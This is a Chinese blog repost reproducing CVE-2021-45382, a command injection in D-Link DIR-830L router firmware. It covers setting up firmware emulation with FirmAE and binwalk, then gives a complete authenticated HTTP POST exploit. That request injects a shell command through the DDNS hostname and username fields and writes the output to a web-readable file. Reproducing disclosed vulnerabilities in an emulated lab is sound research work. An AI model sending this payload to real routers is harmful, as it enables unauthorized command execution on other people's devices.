D-Link DIR-830L 路由器命令执行漏洞（CVE-2021-45382）复现

admin

102360
文章

87
评论

2023年6月30日14:22:20评论116 views字数 1140阅读3分48秒阅读模式

环境搭建

1.FirmAE 工具安装

首先拉取FirmAE 工具仓库

git clone --recursive https://github.com/pr0v3rbs/FirmAE

D-Link DIR-830L 路由器命令执行漏洞（CVE-2021-45382）复现

运行下载脚本

cd FirmAE/./download.sh

运行./install.sh进行安装

2.下载固件

本文模拟的是设备型号为D-Link DIR-830L

下载地址:

https://legacy.us.dlink.com/pages/product.aspx?id=f5e0c0a1975a46bab0b5f38b22c5087b

下载后得到DIR830LA1_FW100B07.bin固件文件

D-Link DIR-830L 路由器命令执行漏洞（CVE-2021-45382）复现

3.FirmAE工具初始化

在FirmAE工具目录下执行./init.sh进行初始化

4.安装binwalk

这里使用FirmAE工具目录下的binwalk安装程序进行安装

cd binwalk-2.3.3/python3 setup.py install

5.模拟运行固件
执行如下命令对固件进行解压

binwalk -Me /root/DIR830LA1_FW100B07.bin --run-as=root

执行如下命令来模拟运行固件

sudo ./run.sh -r DIR-830 /root/DIR830LA1_FW100B07.bin

使用浏览器访问http://192.168.0.1

漏洞复现

Exp如下：

POST /ddns_check.ccp HTTP/1.1Host: 192.168.0.1User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestContent-Length: 102Origin: http://192.168.0.1Connection: closeCookie: uid=YnnCDFxmJY # 认证信息，此漏洞需要认证ccp_act=doCheck&ddnsHostName=;ls />/www/1.html;&ddnsUsername=;ls />/www/1.html;&ddnsPassword=123123123

这里我们已经成功看到执行系统命令，并将ls /命令的结果写入1.html中，直接访问即可查看命令执行的效果。

D-Link DIR-830L 路由器命令执行漏洞（CVE-2021-45382）复现

原文始发于微信公众号（第59号）：D-Link DIR-830L 路由器命令执行漏洞（CVE-2021-45382）复现

左青龙
微信扫一扫

右白虎
微信扫一扫

D-Link DIR-830L 路由器命令执行漏洞（CVE-2021-45382）复现

Hyundai预防互联自动驾驶汽车的网络安全威胁.

使用生成式 AI 开展安全工程

基于微纳卫星的电磁频谱监测系统技术

美国HawkEye 360电磁频谱监测卫星

第三代CAN总线 CAN-XL

智能终端安全：硬件安全技术—CPU安全技术

AUTOSAR实战教程 - 学会读懂AUTOSAR模式管理BswM配置

Arduino 超声波+舵机实现智能垃圾桶

一文了解什么是CNAPP

迅捷PoE*AC路由一体机FR100P-AC固件提取研究

发表评论

在线咨询

微信